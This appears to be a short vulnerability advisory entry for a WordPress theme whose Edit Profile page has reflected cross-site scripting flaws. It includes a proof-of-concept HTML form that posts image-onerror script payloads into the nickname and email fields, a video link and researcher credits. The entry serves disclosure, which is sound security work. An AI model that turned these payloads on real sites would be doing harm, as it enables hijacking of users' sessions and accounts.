The theme does not properly sanitise and escape several of the fields in the Edit Profile page, leading to Reflected Cross-Site Scripting issues
<html> <body> <form action="https://example.com/edit_profile/" method="POST" enctype="multipart/form-data"> <input type="hidden" name="nickname" value=""><img src=x onerror=alert(document.domain)>" /> <input type="hidden" name="email" value=""><img src=x onerror=alert(document.cookies)>" /> <input type="submit" value="Save" /> </form> </body> </html> https://www.youtube.com/watch?v=BeDZCyi7csc
Veshraj Ghimire
Veshraj Ghimire
Yes
2022-05-16 (about 8 months ago)
2022-05-16 (about 8 months ago)
2022-05-17 (about 8 months ago)